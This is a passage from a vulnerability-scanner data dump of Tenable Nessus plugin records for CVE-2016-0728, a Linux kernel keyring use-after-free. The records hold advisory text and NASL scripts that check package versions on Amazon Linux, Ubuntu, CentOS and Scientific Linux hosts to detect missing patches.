(!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release) {\n if (exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'dtrace-modules-4.1.12-32.1.2.el6uek / dtrace-modules-4.1.12-32.1.2.el7uek / kernel-uek / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:46", "description": "Perception Point Research identified a use-after-free vulnerability, representing a local privilege escalation vulnerability in the Linux kernel. Their post contains a detailed analysis of the bug.\n\nkernel-4.1.13-19.30.amzn1 and earlier versions are impacted.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : kernel (ALAS-2016-642)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2019-04-11T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:kernel", "p-cpe:/a:amazon:linux:kernel-debuginfo", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:amazon:linux:kernel-devel", "p-cpe:/a:amazon:linux:kernel-doc", "p-cpe:/a:amazon:linux:kernel-headers", "p-cpe:/a:amazon:linux:kernel-tools", "p-cpe:/a:amazon:linux:kernel-tools-debuginfo", "p-cpe:/a:amazon:linux:kernel-tools-devel", "p-cpe:/a:amazon:linux:perf", "p-cpe:/a:amazon:linux:perf-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-642.NASL", "href": "https://www.tenable.com/plugins/nessus/87991", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-642.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87991);\n script_version(\"2.8\");\n script_cvs_date(\"Date: 2019/04/11 17:23:06\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"ALAS\", value:\"2016-642\");\n\n script_name(english:\"Amazon Linux AMI : kernel (ALAS-2016-642)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Perception Point Research identified a use-after-free vulnerability,\nrepresenting a local privilege escalation vulnerability in the Linux\nkernel. Their post contains a detailed analysis of the bug.\n\nkernel-4.1.13-19.30.amzn1 and earlier versions are impacted.\"\n );\n # http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?20d57016\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-642.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum clean all' followed by 'yum update kernel' to update your\nsystem. You will need to reboot your system in order for the new\nkernel to be running.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"kernel-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-debuginfo-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-devel-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-doc-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-headers-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-debuginfo-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-devel-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-debuginfo-4.1.13-19.31.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debuginfo / kernel-debuginfo-common-i686 / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:29", "description": "Yevgeny Pats discovered that the session keyring implementation in the Linux kernel did not properly reference count when joining an existing session keyring. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux-lts-wily vulnerability (USN-2872-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2872-2.NASL", "href": "https://www.tenable.com/plugins/nessus/88015", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2872-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88015);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2872-2\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-wily vulnerability (USN-2872-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2872-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.2-generic,\nlinux-image-4.2-generic-lpae and / or linux-image-4.2-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2872-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.2.0-25-generic\", pkgver:\"4.2.0-25.30~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.2.0-25-generic-lpae\", pkgver:\"4.2.0-25.30~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.2.0-25-lowlatency\", pkgver:\"4.2.0-25.30~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.2-generic / linux-image-4.2-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:32", "description": "Updated kernel packages that fix one security issue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key management subsystem handled keyring object reference counting in certain error path of the join_session_keyring() function. A local, unprivileged user could use this flaw to escalate their privileges on the system. (CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for reporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. The system must be rebooted for this update to take effect.", "cvss3": {}, "published": "2016-01-26T00:00:00", "type": "nessus", "title": "CentOS 7 : kernel (CESA-2016:0064)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-abi-whitelists", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-debug-devel", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel-doc", "p-cpe:/a:centos:centos:kernel-headers", "p-cpe:/a:centos:centos:kernel-tools", "p-cpe:/a:centos:centos:kernel-tools-libs", "p-cpe:/a:centos:centos:kernel-tools-libs-devel", "p-cpe:/a:centos:centos:perf", "p-cpe:/a:centos:centos:python-perf", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2016-0064.NASL", "href": "https://www.tenable.com/plugins/nessus/88148", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0064 and \n# CentOS Errata and Security Advisory 2016:0064 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88148);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"RHSA\", value:\"2016:0064\");\n\n script_name(english:\"CentOS 7 : kernel (CESA-2016:0064)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in\ncertain error path of the join_session_keyring() function. A local,\nunprivileged user could use this flaw to escalate their privileges on\nthe system. (CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. The system\nmust be rebooted for this update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2016-January/021625.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5252ffe4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0728\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-abi-whitelists-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-doc-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"perf-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-327.4.5.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / kernel-debug-devel / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:33", "description": "* A use-after-free flaw was found in the way the Linux kernel's key management subsystem handled keyring object reference counting in certain error path of the join_session_keyring() function. A local, unprivileged user could use this flaw to escalate their privileges on the system. (CVE-2016-0728, Important)\n\nThe system must be rebooted for this update to take effect.", "cvss3": {}, "published": "2016-01-26T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : kernel on SL7.x x86_64 (20160125)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel", "p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-doc", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:kernel-tools", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel", "p-cpe:/a:fermilab:scientific_linux:perf", "p-cpe:/a:fermilab:scientific_linux:perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-perf", "p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20160125_KERNEL_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/88174", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88174);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-0728\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL7.x x86_64 (20160125)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in\ncertain error path of the join_session_keyring() function. A local,\nunprivileged user could use this flaw to escalate their privileges on\nthe system. (CVE-2016-0728, Important)\n\nThe system must be rebooted for this update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1601&L=scientific-linux-errata&F=&S=&P=11419\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3869eafb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", 